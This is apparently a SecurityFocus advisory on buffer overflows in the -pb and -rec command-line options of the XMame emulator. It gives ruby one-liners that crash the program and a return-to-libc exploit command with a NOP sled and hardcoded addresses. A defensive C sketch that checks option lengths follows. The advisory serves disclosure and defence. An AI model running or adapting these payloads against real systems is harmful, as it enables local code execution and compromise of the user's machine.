XMame Multiple Local Command Line Argument Buffer Overflow Vulnerabilities

The following examples are sufficient to crash the application:
xmame.x11 -pb `ruby -e 'print "A" * 1034'`
xmame.x11 -rec `ruby -e 'print "A" * 1020'`

The following return-to-libc exploit is also available:
./xmame.x11 -pb `ruby -e 'print "\x90" * 1016;print "\xd0\xf6\xd8\xb7";print "DUMP";print "\xaa\xf8\xff\xbf"'`

Exploit code by Rafael San Miguel Carrasco <smcsoc@yahoo.es> is also available (xmame_bf_exploit.txt).
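
The crash cases above come from over-long values for the -pb and -rec options overflowing a buffer. As an added illustration (not XMame's code and not part of the original advisory), the C sketch below shows option parsing that rejects such values instead of copying them; the 1024-byte buffer size and all names are assumptions.

```c
#include <stdio.h>
#include <string.h>

#define NAME_BUF_SIZE 1024   /* assumed size, not taken from XMame's source */

struct playback_opts {
    char playback[NAME_BUF_SIZE];  /* value given to -pb  */
    char record[NAME_BUF_SIZE];    /* value given to -rec */
};

/* Copy src into dst only if it fits including the terminator. */
static int copy_option_value(char *dst, size_t dst_size, const char *src)
{
    size_t len = strlen(src);      /* argv strings are NUL-terminated */
    if (len >= dst_size)
        return -1;                 /* too long: refuse rather than truncate */
    memcpy(dst, src, len + 1);
    return 0;
}

/* Returns 0 on success, -1 on a missing or over-long option value. */
int parse_playback_opts(int argc, char **argv, struct playback_opts *o)
{
    memset(o, 0, sizeof *o);
    for (int i = 1; i < argc; i++) {
        char *dst = NULL;
        if (strcmp(argv[i], "-pb") == 0)
            dst = o->playback;
        else if (strcmp(argv[i], "-rec") == 0)
            dst = o->record;
        if (dst == NULL)
            continue;              /* not an option this sketch handles */
        if (++i >= argc)
            return -1;             /* option given without a value */
        if (copy_option_value(dst, NAME_BUF_SIZE, argv[i]) != 0) {
            fprintf(stderr, "%s: value too long (max %d bytes)\n",
                    argv[i - 1], NAME_BUF_SIZE - 1);
            return -1;
        }
    }
    return 0;
}

int main(int argc, char **argv)
{
    struct playback_opts o;
    return parse_playback_opts(argc, argv, &o) == 0 ? 0 : 1;
}
```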


 

Copyright 2010, SecurityFocus